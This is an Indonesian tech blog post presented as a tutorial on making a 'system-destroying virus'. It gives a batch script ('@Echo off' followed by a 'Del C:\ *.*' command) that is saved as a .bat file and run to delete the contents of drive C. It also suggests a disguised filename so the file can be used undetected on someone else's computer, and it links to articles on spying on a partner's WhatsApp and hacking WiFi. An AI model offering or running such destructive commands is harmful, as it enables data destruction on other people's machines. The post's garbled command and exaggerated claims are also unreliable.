Cara Membuat Virus Perusak Sistem Komputer Hanya Dalam Hitungan Detik

0
1342
Cara Membuat Virus Perusak Sistem Komputer B
Copyright ©Job-like

Trik Membuat Virus Komputer dengan Mudah

Oketekno.com – Komputer atau Laptop merupakan salah satu perangkat elektronik yang memiliki banyak manfaat. Walaupun saat ini sudah ada perangkat Smartphone yang lebih sederhana dengan manfaat yang sama, akan tetapi sebagian besar kalangan masih belum puas karena area controlling yang terbatas dan layarnya yang kecil juga.

Akan tetapi kita juga harus tetap waspada terhadap virus-virus yang mencoba menyerang Komputer, seaman apapun komputer masih tetap memiliki celah keamanan yang dapat merusak sistem bahkan hardware-nya. Namun selama ini kita menganggap kalau virus itu susah diciptakan, tapi pada nyatanya tidak kok guys.

Simak Nih: Cara Menyadap WhatsApp Pacar dengan Komputer, 100% Berhasil dan Pasti Aman!

Kalian bisa membuat virus sendiri yang mematikan bagi perangkat Komputer hanya dalam kurun waktu 1 menit saja untuk menghapus Drive C dimana semua aplikasi termasuk OS terpasang disana. Penasaran? Yuk, langsung saja simak pembahasan selengkapnya mengenai cara membuat virus perusak sistem Komputer berikut ini.

Cara Membuat Virus Perusak Sistem Komputer

Pertama kita buka terlebih dahulu aplikasi Notepad atau software penulis script lainnya seperti Dreamweaver, Notepad ++ dan masih banyak lagi yang lainnya.

Cara Membuat Virus Perusak Sistem Komputer 1
Copyright ©Oketekno

Setelah itu kita tuliskan script virus “@Echo off”, enter untuk ganti baris, lalu ketikkan “Del C:\ *.* |y” di notepad. Tanpa tanda petik semua ya guys. Seperti ini contohnya:

Ketahui Juga: Cara Hack WiFi Menggunakan Komputer

Cara Membuat Virus Perusak Sistem Komputer 2
Copyright ©Oketekno

Cara membuat Virus perusak sistem Komputer berikutnya yakni kita simpan file script tersebut dengan format file (.bat), supaya tidak keliru atau salah pencet nantinya kita kasih nama Virus.bat saja. Akan tetapi kalau memang untuk tujuan lain yang menguntungkan bagi orang lain dan tidak ketahuan bisa dikasih nama sayonara.bat atau mungkin yang lain.

Coba Yuk: Cara Mengendalikan Komputer dengan Smartphone

Cara Membuat Virus Perusak Sistem Komputer 3
Copyright ©Oketekno

Dengan begini maka kalian sudah mendapatkan file virus tuh. Untuk memulai operasi, kalian bisa langsung double klik untuk membukanya dan langsung terdelete deh semuanya.

Seperti itulah guys Cara Membuat Virus Perusak Sistem Komputer yang bisa kalian coba terapkan sendiri pada perangkat kalian masing-masing sebagai tutorialnya. Namun ingat, jangan gunakan untuk merugikan orang lain ya guys, manfaatkan virus ini dengan bijak. Contohnya saja seperti ketika ada komputer teman lemot dan minta di Install ulang atau mungkin gejala lainnya.

baca juga: Cara Bermain Game PS3 di Laptop atau Komputer Tanpa Kendala Lag

LEAVE A REPLY

Please enter your comment!
Please enter your name here